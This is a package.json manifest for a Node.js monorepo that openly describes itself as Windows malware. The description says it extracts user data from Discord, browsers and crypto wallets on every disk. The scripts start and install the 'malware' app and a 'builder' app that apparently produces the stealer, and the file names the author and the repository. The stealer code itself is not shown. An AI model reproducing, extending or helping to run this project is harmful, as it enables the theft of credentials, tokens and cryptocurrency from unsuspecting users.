{
    "name": "@wish/workspace",
    "version": "1.0.13",
    "description": "Node.js malware for Windows that extracts user data from Discord, browsers, crypto wallets, and more, affecting all users on every disk.",
    "exports": null,
    "type": "commonjs",
    "scripts": {
        "malware:start": "cd apps/malware && node index",
        "malware:install": "cd apps/malware && install.bat",
        "builder:start": "cd apps/builder && node index",
        "builder:install": "cd apps/builder && install.bat",
        "format": "prettier . --write --cache --ignore-unknown",
        "format:check": "prettier . --check --ignore-unknown",
        "lint": "eslint .",
        "lint:fix": "eslint . --fix"
    },
    "repository": {
        "type": "git",
        "url": "git+https://github.com/k4itrun/wish.git"
    },
    "keywords": [],
    "author": {
        "name": "k4itrun",
        "email": "tsx@billoneta.xyz"
    },
    "license": "MIT",
    "bugs": {
        "url": "https://github.com/k4itrun/wish/issues"
    },
    "homepage": "https://github.com/k4itrun/wish#readme",
    "dependencies": {
        "@billoneta/config": "^1.0.6",
        "@billoneta/gitmoji": "^1.0.6",
        "@billoneta/utils": "^1.0.6",
        "markdown-table": "3.0.4",
        "turbo": "2.5.3"
    },
    "devDependencies": {
        "@commitlint/cli": "^19.8.1",
        "@commitlint/types": "^19.8.1",
        "@dotenvx/dotenvx": "^1.44.1",
        "eslint": "^9.27.0",
        "lefthook": "^1.11.13",
        "prettier": "^3.5.3",
        "semantic-release": "^24.2.5"
    },
    "packageManager": "pnpm@10.11.0",
    "pnpm": {
        "onlyBuiltDependencies": [
            "esbuild",
            "lefthook",
            "unrs-resolver"
        ]
    }
}
